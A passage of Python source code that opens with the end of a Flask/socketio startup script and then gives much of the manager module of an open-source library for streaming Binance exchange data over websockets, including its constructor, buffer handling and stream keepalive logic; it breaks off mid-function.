t_websocket_events.start()
app.socketio.run(get_app(), debug=True, host=api_settings.HOST)
stop_websocket_threads = True
t_websocket_events.join()
if 'COVERAGE' in os.environ:
save_coverage()
else:
# Starting via uwsgi
from cnaas_nms.api import app
from cnaas_nms.db.session import redis_session
import json
t_websocket_events = threading.Thread(target=thread_websocket_events)
t_websocket_events.start()
cnaas_app = get_app()
if 'COVERAGE' in os.environ:
save_coverage()
|
manager.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: unicorn_binance_websocket_api/manager.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://www.lucit.tech/unicorn-binance-websocket-api.html
# Github: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://unicorn-binance-websocket-api.docs.lucit.tech
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.exceptions import StreamRecoveryError, UnknownExchange
from unicorn_binance_websocket_api.sockets import BinanceWebSocketApiSocket
from unicorn_binance_websocket_api.restclient import BinanceWebSocketApiRestclient
from unicorn_binance_websocket_api.restserver import BinanceWebSocketApiRestServer
from cheroot import wsgi
from collections import deque
from datetime import datetime
from flask import Flask, redirect
from flask_restful import Api
from typing import Optional, Union
import asyncio
import colorama
import copy
import logging
import hashlib
import os
import platform
import psutil
import re
import requests
import sys
import threading
import time
import traceback
import uuid
import ujson as json
import websockets
logger = logging.getLogger("unicorn_binance_websocket_api")
class BinanceWebSocketApiManager(threading.Thread):
"""
    An unofficial Python API to use the Binance Websocket APIs (com+testnet, com-margin+testnet,
    com-isolated_margin+testnet, com-futures+testnet, us, jex, dex/chain+testnet) in an easy, fast, flexible,
    robust and fully-featured way.
    This library supports two different kinds of websocket endpoints:
- CEX (Centralized exchange): binance.com, binance.vision, binance.je, binance.us, trbinance.com, jex.com
- DEX (Decentralized exchange): binance.org
Binance.com websocket API documentation:
- https://github.com/binance/binance-spot-api-docs/blob/master/web-socket-streams.md
- https://binance-docs.github.io/apidocs/futures/en/#user-data-streams
- https://binance-docs.github.io/apidocs/spot/en/#user-data-streams
Binance.vision (Testnet) websocket API documentation:
- https://testnet.binance.vision/
Binance.us websocket API documentation:
- https://docs.binance.us/#introduction
TRBinance.com websocket API documentation:
- https://www.trbinance.com/apidocs/#general-wss-information
Jex.com websocket API documentation:
- https://jexapi.github.io/api-doc/option.html#web-socket-streams
- https://jexapi.github.io/api-doc/option.html#user-data-streams
Binance.org websocket API documentation:
- https://docs.binance.org/api-reference/dex-api/ws-connection.html
:param process_stream_data: Provide a function/method to process the received webstream data (callback). The function
will be called instead of
`add_to_stream_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.add_to_stream_buffer>`_
like `process_stream_data(stream_data, stream_buffer_name)` where
                                `stream_data` contains the raw_stream_data. If not provided, the raw stream_data will
get stored in the stream_buffer or provided to a specific callback function of
`create_stream()`! `How to read from stream_buffer!
<https://unicorn-binance-websocket-api.docs.lucit.tech/README.html#and-4-more-lines-to-print-the-receives>`_
:type process_stream_data: function
:param exchange: Select binance.com, binance.com-testnet, binance.com-margin, binance.com-margin-testnet,
binance.com-isolated_margin, binance.com-isolated_margin-testnet, binance.com-futures,
binance.com-futures-testnet, binance.com-coin_futures, binance.us, trbinance.com,
jex.com, binance.org or binance.org-testnet (default: binance.com)
:type exchange: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:param throw_exception_if_unrepairable: set to `True` to activate exceptions if a crashed stream is unrepairable
(invalid API key, exceeded subscription limit) or an unknown exchange is
used
:type throw_exception_if_unrepairable: bool
:param restart_timeout: A stream restart must be successful within this time, otherwise a new restart will be
initialized. Default is 6 seconds.
:type restart_timeout: int
:param show_secrets_in_logs: set to True to show secrets like listen_key, api_key or api_secret in log file
(default=False)
:type show_secrets_in_logs: bool
:param output_default: set to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/LUCIT-Systems-and-Development/unicorn-fy>`_ - otherwise
with the default setting "raw_data" the output remains unchanged and gets delivered as
received from the endpoints. Change this for a specific stream with the `output` parameter
of `create_stream()` and `replace_stream()`
:type output_default: str
:param enable_stream_signal_buffer: set to True to enable the
`stream_signal_buffer <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
and receive information about
disconnects and reconnects to manage a restore of the lost data during the
                                        interruption or to recognize that your bot has gone blind.
:type enable_stream_signal_buffer: bool
:param disable_colorama: set to True to disable the use of `colorama <https://pypi.org/project/colorama/>`_
:type disable_colorama: bool
:param stream_buffer_maxlen: Set a max len for the generic `stream_buffer`. This parameter can also be used within
`create_stream()` for a specific `stream_buffer`.
:type stream_buffer_maxlen: int or None
:param process_stream_signals: Provide a function/method to process the received stream signals. The function is running inside an asyncio loop and will be
called instead of
`add_to_stream_signal_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.add_to_stream_signal_buffer>`_
                                   like `process_stream_signals(signal_type=False, stream_id=False, data_record=False)`.
:type process_stream_signals: function
:param close_timeout_default: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection.
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/design.html?highlight=close_timeout#closing-handshake>`_
:type close_timeout_default: int
:param ping_interval_default: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior.
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/timeouts.html?highlight=ping_interval#keepalive-in-websockets>`_
:type ping_interval_default: int
:param ping_timeout_default: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior.
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/timeouts.html?highlight=ping_interval#keepalive-in-websockets>`_
:type ping_timeout_default: int
:param high_performance: Set to `True` to make `create_stream()` a non-blocking function
:type high_performance: bool
"""
def __init__(self,
process_stream_data=False,
exchange="binance.com",
warn_on_update=True,
throw_exception_if_unrepairable=False,
restart_timeout=6,
show_secrets_in_logs=False,
output_default="raw_data",
enable_stream_signal_buffer=False,
disable_colorama=False,
stream_buffer_maxlen=None,
process_stream_signals=False,
close_timeout_default: int = 1,
ping_interval_default: int = 5,
ping_timeout_default: int = 10,
high_performance=False,
debug=False):
threading.Thread.__init__(self)
self.name = "unicorn-binance-websocket-api"
self.version = "1.41.0.dev"
logger.info(f"New instance of {self.get_user_agent()} on "
f"{str(platform.system())} {str(platform.release())} for exchange {exchange} started ...")
self.debug = debug
logger.info(f"Debug is {self.debug}")
if disable_colorama is not True:
logger.info(f"Initiating `colorama_{colorama.__version__}`")
colorama.init()
logger.info(f"Using `websockets_{websockets.__version__}`")
self.specific_process_stream_data = {}
if process_stream_data is False:
# no special method to process stream data provided, so we use add_to_stream_buffer:
self.process_stream_data = self.add_to_stream_buffer
logger.info(f"Using `stream_buffer`")
else:
# use the provided method to process stream data:
self.process_stream_data = process_stream_data
logger.info(f"Using `process_stream_data`")
if process_stream_signals is False:
# no special method to process stream signals provided, so we use add_to_stream_signal_buffer:
self.process_stream_signals = self.add_to_stream_signal_buffer
logger.info(f"Using `stream_signal_buffer`")
else:
# use the provided method to process stream signals:
self.process_stream_signals = process_stream_signals
logger.info(f"Using `process_stream_signals` ...")
self.exchange = exchange
if self.exchange == "binance.com":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-futures":
self.websocket_base_uri = "wss://fstream.binance.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.com-coin-futures" or self.exchange == "binance.com-coin_futures":
self.websocket_base_uri = "wss://dstream.binance.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.com-futures-testnet":
self.websocket_base_uri = "wss://stream.binancefuture.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.us":
self.websocket_base_uri = "wss://stream.binance.us:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "trbinance.com":
self.websocket_base_uri = "wss://stream-cloud.trbinance.com/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "jex.com":
self.websocket_base_uri = "wss://ws.jex.com/"
self.max_subscriptions_per_stream = 10
elif self.exchange == "binance.org":
self.websocket_base_uri = "wss://dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.org-testnet":
self.websocket_base_uri = "wss://testnet-dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
else:
# Unknown Exchange
error_msg = f"Unknown exchange '{str(self.exchange)}'! Read the docs to see a list of supported " \
f"exchanges: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/" \
f"Binance-websocket-endpoint-configuration-overview"
logger.critical(error_msg)
raise UnknownExchange(error_msg)
self.stop_manager_request = None
self.all_subscriptions_number = 0
self.binance_api_status = {'weight': None,
'timestamp': 0,
'status_code': None}
self.dex_user_address = False
self.enable_stream_signal_buffer = enable_stream_signal_buffer
self.event_loops = {}
self.frequent_checks_list = {}
self.frequent_checks_list_lock = threading.Lock()
self.receiving_speed_average = 0
self.receiving_speed_peak = {'value': 0,
'timestamp': time.time()}
self.high_performance = high_performance
self.keep_max_received_last_second_entries = 5
self.keepalive_streams_list = {}
self.last_entry_added_to_stream_buffer = 0
self.last_monitoring_check = time.time()
self.last_update_check_github = {'timestamp': time.time(),
'status': None}
self.last_update_check_github['status']: dict = None
self.last_update_check_github_check_command = {'timestamp': time.time(),
'status': None}
self.max_send_messages_per_second = 5
self.max_send_messages_per_second_reserve = 2
self.most_receives_per_second = 0
self.monitoring_api_server = False
self.monitoring_total_received_bytes = 0
self.monitoring_total_receives = 0
self.output_default = output_default
self.reconnects = 0
self.reconnects_lock = threading.Lock()
self.request_id = 0
self.request_id_lock = threading.Lock()
self.restart_requests = {}
self.restart_timeout = restart_timeout
self.ringbuffer_error = []
self.ringbuffer_error_max_size = 500
self.ringbuffer_result = []
self.ringbuffer_result_max_size = 500
self.show_secrets_in_logs = show_secrets_in_logs
self.start_time = time.time()
self.stream_buffer_maxlen = stream_buffer_maxlen
self.stream_buffer = deque(maxlen=self.stream_buffer_maxlen)
self.stream_buffer_lock = threading.Lock()
self.stream_buffer_locks = {}
self.stream_buffers = {}
self.stream_list = {}
self.stream_list_lock = threading.Lock()
self.stream_signal_buffer = deque()
self.stream_signal_buffer_lock = threading.Lock()
self.socket_is_ready = {}
self.stream_threads = {}
self.stream_threading_lock = {}
self.throw_exception_if_unrepairable = throw_exception_if_unrepairable
self.total_received_bytes = 0
self.total_received_bytes_lock = threading.Lock()
self.total_receives = 0
self.total_receives_lock = threading.Lock()
self.total_transmitted = 0
self.total_transmitted_lock = threading.Lock()
self.websocket_list = {}
self.close_timeout_default = close_timeout_default
self.ping_interval_default = ping_interval_default
self.ping_timeout_default = ping_timeout_default
self.start()
self.replacement_text = "***SECRET_REMOVED***"
self.restclient = BinanceWebSocketApiRestclient(self)
if warn_on_update and self.is_update_available():
update_msg = f"Release {self.name}_" + self.get_latest_version() + " is available, " \
"please consider updating! (Changelog: https://github.com/LUCIT-Systems-and-Development/" \
"unicorn-binance-websocket-api/blob/master/CHANGELOG.md)"
print(update_msg)
logger.warning(update_msg)
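# --- Usage sketch (illustrative, not part of the class) -------------------------------
# A minimal example of creating a manager and reading from the generic `stream_buffer`.
# Only methods referenced in this module are used (`create_stream()`,
# `pop_stream_data_from_stream_buffer()`); the import path and the channel/market values
# are assumptions and may differ in your setup.
#
#   from unicorn_binance_websocket_api import BinanceWebSocketApiManager
#   import time
#
#   ubwa = BinanceWebSocketApiManager(exchange="binance.com", output_default="dict")
#   ubwa.create_stream(['trade'], ['btcusdt'])
#   while True:
#       data = ubwa.pop_stream_data_from_stream_buffer()
#       if data is False:
#           time.sleep(0.01)
#       else:
#           print(data)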
def clear_buffer(self, stream_buffer_name=False):
#self.stream_buffer_locks[stream_buffer_name] = threading.Lock()
#self.stream_buffers[stream_buffer_name] = []
if stream_buffer_name is False:
try:
with self.stream_buffer_lock:
stream_data = self.stream_buffer = deque()
return stream_data
except IndexError:
return False
else:
try:
with self.stream_buffer_locks[stream_buffer_name]:
stream_data = self.stream_buffers[stream_buffer_name] = deque()
return stream_data
except IndexError:
return False
except KeyError:
return False
def _add_stream_to_stream_list(self,
stream_id,
channels,
markets,
stream_label=None,
stream_buffer_name=False,
api_key=False,
api_secret=False,
symbols=False,
output=False,
ping_interval=None,
ping_timeout=None,
close_timeout=None,
stream_buffer_maxlen=None,
process_stream_data=None):
"""
Create a list entry for new streams
:param stream_id: provide a stream_id (only needed for userData streams to acquire a listenKey)
:type stream_id: str
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_label: provide a stream_label for the stream
:type stream_label: str
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:param output: the default setting `raw_data` can be globally overwritten with the parameter
`output_default <https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
of BinanceWebSocketApiManager`. To overrule the `output_default` value for this specific stream,
set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/LUCIT-Systems-and-Development/unicorn-fy>`_ - otherwise with
the default setting "raw_data" the output remains unchanged and gets delivered as received from
the endpoints
:type output: str
:param ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/timeouts.html?highlight=ping_interval#keepalive-in-websockets>`_
:type ping_interval: int or None
:param ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/timeouts.html?highlight=ping_interval#keepalive-in-websockets>`_
:type ping_timeout: int or None
:param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/design.html?highlight=close_timeout#closing-handshake>`_
:type close_timeout: int or None
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` uses always the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
:param process_stream_data: Provide a function/method to process the received webstream data. The function
will be called instead of
`add_to_stream_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.add_to_stream_buffer>`_
like `process_stream_data(stream_data, stream_buffer_name)` where
`stream_data` contains the raw_stream_data. If not provided, the raw stream_data will
get stored in the stream_buffer! `How to read from stream_buffer!
<https://unicorn-binance-websocket-api.docs.lucit.tech/README.html#and-4-more-lines-to-print-the-receives>`_
:type process_stream_data: function
"""
output = output or self.output_default
close_timeout = close_timeout or self.close_timeout_default
ping_interval = ping_interval or self.ping_interval_default
ping_timeout = ping_timeout or self.ping_timeout_default
self.specific_process_stream_data[stream_id] = process_stream_data
self.stream_threading_lock[stream_id] = {'full_lock': threading.Lock(),
'receives_statistic_last_second_lock': threading.Lock()}
self.stream_list[stream_id] = {'exchange': self.exchange,
'stream_id': copy.deepcopy(stream_id),
'recent_socket_id': None,
'channels': copy.deepcopy(channels),
'markets': copy.deepcopy(markets),
'stream_label': copy.deepcopy(stream_label),
'stream_buffer_name': copy.deepcopy(stream_buffer_name),
'stream_buffer_maxlen': copy.deepcopy(stream_buffer_maxlen),
'symbols': copy.deepcopy(symbols),
'output': copy.deepcopy(output),
'subscriptions': 0,
'payload': [],
'api_key': copy.deepcopy(api_key),
'api_secret': copy.deepcopy(api_secret),
'dex_user_address': copy.deepcopy(self.dex_user_address),
'ping_interval': copy.deepcopy(ping_interval),
'ping_timeout': copy.deepcopy(ping_timeout),
'close_timeout': copy.deepcopy(close_timeout),
'status': 'starting',
'start_time': time.time(),
'processed_receives_total': 0,
'receives_statistic_last_second': {'most_receives_per_second': 0, 'entries': {}},
'seconds_to_last_heartbeat': None,
'last_heartbeat': None,
'stop_request': None,
'crash_request': None,
'kill_request': None,
'seconds_since_has_stopped': None,
'has_stopped': False,
'reconnects': 0,
'last_stream_signal': None,
'logged_reconnects': [],
'processed_transmitted_total': 0,
'last_static_ping_listen_key': 0,
'listen_key': False,
'listen_key_cache_time': 30 * 60,
'last_received_data_record': None,
'processed_receives_statistic': {},
'transfer_rate_per_second': {'bytes': {}, 'speed': 0}}
logger.info("BinanceWebSocketApiManager._add_stream_to_stream_list(" +
str(stream_id) + ", " + str(channels) + ", " + str(markets) + ", " + str(stream_label) + ", "
+ str(stream_buffer_name) + ", " + str(stream_buffer_maxlen) + ", " + str(symbols) + ")")
def _create_stream_thread(self,
loop,
stream_id,
channels,
markets,
stream_buffer_name=False,
stream_buffer_maxlen=None,
restart=False):
"""
Co-function of self.create_stream() to create a thread for the socket and to manage the coroutine
:param loop: provide an asyncio loop
:type loop: asyncio loop
:param stream_id: provide a stream_id (only needed for userData streams to acquire a listenKey)
:type stream_id: str
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` uses always the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
:param restart: set to `True` if it's a restart!
:type restart: bool
:return:
"""
if self.is_stop_request(stream_id):
return False
if restart is False:
if stream_buffer_name is not False:
self.stream_buffer_locks[stream_buffer_name] = threading.Lock()
try:
# Not resetting the stream_buffer during a restart:
if self.stream_buffers[stream_buffer_name]:
pass
except KeyError:
# Resetting
self.stream_buffers[stream_buffer_name] = deque(maxlen=stream_buffer_maxlen)
asyncio.set_event_loop(loop)
socket = BinanceWebSocketApiSocket(self, stream_id, channels, markets)
try:
loop.run_until_complete(socket.start_socket())
except RuntimeError as error_msg:
if "cannot schedule new futures after interpreter shutdown" in str(error_msg):
logger.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f" - RuntimeError `error: 11` - error_msg: {str(error_msg)} - Please create an issue: "
f"https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/"
f"issues/new/choose")
self.stop_manager_with_all_streams()
sys.exit(1)
elif "This event loop is already running" in str(error_msg):
logger.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f" - RuntimeError - error_msg: {str(error_msg)}")
else:
logger.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f" - RuntimeError `error: 7` - error_msg: {str(error_msg)} - Please create an issue: "
f"https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/issues/"
f"new/choose")
finally:
try:
if self.stream_list[stream_id]['last_stream_signal'] is not None and \
self.stream_list[stream_id]['last_stream_signal'] != "DISCONNECT":
self.process_stream_signals("DISCONNECT", stream_id)
self.stream_list[stream_id]['last_stream_signal'] = "DISCONNECT"
except KeyError as error_msg:
logger.debug(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} - "
f"KeyError `error: 12` - {error_msg}")
loop.close()
self.set_socket_is_ready(stream_id)
def _frequent_checks(self):
"""
This method gets started as a thread and is doing the frequent checks
"""
frequent_checks_id = time.time()
cpu_usage_time = False
with self.frequent_checks_list_lock:
self.frequent_checks_list[frequent_checks_id] = {'last_heartbeat': 0,
'stop_request': None,
'has_stopped': False}
logger.info("BinanceWebSocketApiManager._frequent_checks() new instance created with frequent_checks_id=" +
str(frequent_checks_id))
# threaded loop for min 1 check per second
while self.stop_manager_request is None and self.frequent_checks_list[frequent_checks_id]['stop_request'] \
is None:
with self.frequent_checks_list_lock:
self.frequent_checks_list[frequent_checks_id]['last_heartbeat'] = time.time()
time.sleep(0.3)
current_timestamp = int(time.time())
last_timestamp = current_timestamp - 1
next_to_last_timestamp = current_timestamp - 2
total_most_stream_receives_last_timestamp = 0
total_most_stream_receives_next_to_last_timestamp = 0
active_stream_list = self.get_active_stream_list()
# check CPU stats
cpu = self.get_process_usage_cpu()
if cpu >= 95:
time_of_waiting = 5
if cpu_usage_time is False:
cpu_usage_time = time.time()
elif (time.time() - cpu_usage_time) > time_of_waiting:
logger.warning(f"BinanceWebSocketApiManager._frequent_checks() - High CPU usage since "
f"{str(time_of_waiting)} seconds: {str(cpu)}")
cpu_usage_time = False
else:
cpu_usage_time = False
# count most_receives_per_second total last second
if active_stream_list:
for stream_id in active_stream_list:
# set the streams `most_receives_per_second` value
try:
if self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp] > \
self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']:
self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second'] = \
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
except KeyError:
pass
try:
total_most_stream_receives_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
except KeyError:
pass
try:
total_most_stream_receives_next_to_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][next_to_last_timestamp]
except KeyError:
pass
# delete list entries older than `keep_max_received_last_second_entries`
# receives_statistic_last_second
delete_index = []
if len(self.stream_list[stream_id]['receives_statistic_last_second']['entries']) > \
self.keep_max_received_last_second_entries:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
temp_entries = copy.deepcopy(self.stream_list[stream_id]['receives_statistic_last_second']['entries'])
for timestamp_key in temp_entries:
try:
if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
delete_index.append(timestamp_key)
except ValueError as error_msg:
logger.error("BinanceWebSocketApiManager._frequent_checks() timestamp_key=" +
str(timestamp_key) + " current_timestamp=" + str(current_timestamp) +
" keep_max_received_last_second_entries=" +
str(self.keep_max_received_last_second_entries) + " error_msg=" +
str(error_msg))
for timestamp_key in delete_index:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'].pop(timestamp_key,
None)
# transfer_rate_per_second
delete_index = []
if len(self.stream_list[stream_id]['transfer_rate_per_second']['bytes']) > \
self.keep_max_received_last_second_entries:
try:
temp_bytes = self.stream_list[stream_id]['transfer_rate_per_second']['bytes']
for timestamp_key in temp_bytes:
try:
if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
delete_index.append(timestamp_key)
except ValueError as error_msg:
logger.error(
"BinanceWebSocketApiManager._frequent_checks() timestamp_key="
+ str(timestamp_key) +
" current_timestamp=" + str(current_timestamp) +
" keep_max_received_last_second_"
"entries=" + str(self.keep_max_received_last_second_entries) + " error_msg=" +
str(error_msg))
except RuntimeError as error_msg:
logger.info("BinanceWebSocketApiManager._frequent_checks() - "
"Catched RuntimeError: " + str(error_msg))
for timestamp_key in delete_index:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'].pop(timestamp_key, None)
# set most_receives_per_second
try:
if int(self.most_receives_per_second) < int(total_most_stream_receives_last_timestamp):
self.most_receives_per_second = int(total_most_stream_receives_last_timestamp)
except ValueError as error_msg:
logger.error("BinanceWebSocketApiManager._frequent_checks() self.most_receives_per_second"
"=" + str(self.most_receives_per_second) + " total_most_stream_receives_last_timestamp"
"=" + str(total_most_stream_receives_last_timestamp) + " total_most_stream_receives_next_"
"to_last_timestamp=" + str(total_most_stream_receives_next_to_last_timestamp) + " error_"
"msg=" + str(error_msg))
# check receiving_speed_peak
last_second_receiving_speed = self.get_current_receiving_speed_global()
try:
if last_second_receiving_speed > self.receiving_speed_peak['value']:
self.receiving_speed_peak['value'] = last_second_receiving_speed
self.receiving_speed_peak['timestamp'] = time.time()
logger.info(f"BinanceWebSocketApiManager._frequent_checks() - reached new "
f"`highest_receiving_speed` "
f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} at "
f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])}")
except TypeError as error_msg:
pass
# send keepalive for `!userData` streams every 30 minutes
if active_stream_list:
for stream_id in active_stream_list:
if isinstance(active_stream_list[stream_id]['markets'], str):
active_stream_list[stream_id]['markets'] = [active_stream_list[stream_id]['markets'], ]
if isinstance(active_stream_list[stream_id]['channels'], str):
active_stream_list[stream_id]['channels'] = [active_stream_list[stream_id]['channels'], ]
if "!userData" in active_stream_list[stream_id]['markets'] or \
"!userData" in active_stream_list[stream_id]['channels']:
if (active_stream_list[stream_id]['start_time'] +
active_stream_list[stream_id]['listen_key_cache_time']) < time.time() and \
(active_stream_list[stream_id]['last_static_ping_listen_key'] +
active_stream_list[stream_id]['listen_key_cache_time']) < time.time():
# keep-alive the listenKey
self.restclient.keepalive_listen_key(stream_id)
# set last_static_ping_listen_key
self.stream_list[stream_id]['last_static_ping_listen_key'] = time.time()
self.set_heartbeat(stream_id)
logger.info("BinanceWebSocketApiManager._frequent_checks() - sent listen_key keepalive "
"ping for stream_id=" + str(stream_id))
sys.exit(0)
def _handle_task_result(self, task: asyncio.Task) -> None:
"""
This method is a callback for `loop.create_task()` to retrieve the task exception and avoid the `Task exception
was never retrieved` traceback on stdout:
https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/issues/261
"""
try:
task.result()
except asyncio.CancelledError:
logger.debug(f"BinanceWebSocketApiManager._handle_task_result() - asyncio.CancelledError raised by task "
f"= {task}")
except SystemExit as error_code:
logger.debug(f"BinanceWebSocketApiManager._handle_task_result() - SystemExit({error_code}) raised by task "
f"= {task}")
except Exception as error_msg:
logger.critical(f"BinanceWebSocketApiManager._handle_task_result() - Exception({error_msg}) raised by task "
f"= {task}")
def _keepalive_streams(self):
"""
This method is started as a thread and observes the streams; if necessary it restarts a dead stream
"""
keepalive_streams_id = time.time()
self.keepalive_streams_list[keepalive_streams_id] = {'last_heartbeat': 0,
'stop_request': None,
'has_stopped': False}
logger.info("BinanceWebSocketApiManager._keepalive_streams() new instance created with "
"keepalive_streams_id=" + str(keepalive_streams_id))
# threaded loop to restart crashed streams:
while self.stop_manager_request is None and \
self.keepalive_streams_list[keepalive_streams_id]['stop_request'] is None:
time.sleep(1)
self.keepalive_streams_list[keepalive_streams_id]['last_heartbeat'] = time.time()
# restart streams with a restart_request (status == new)
temp_restart_requests = copy.deepcopy(self.restart_requests)
for stream_id in temp_restart_requests:
try:
# find restarts that didn't work
if self.restart_requests[stream_id]['status'] == "restarted" and \
self.restart_requests[stream_id]['last_restart_time']+self.restart_timeout < time.time():
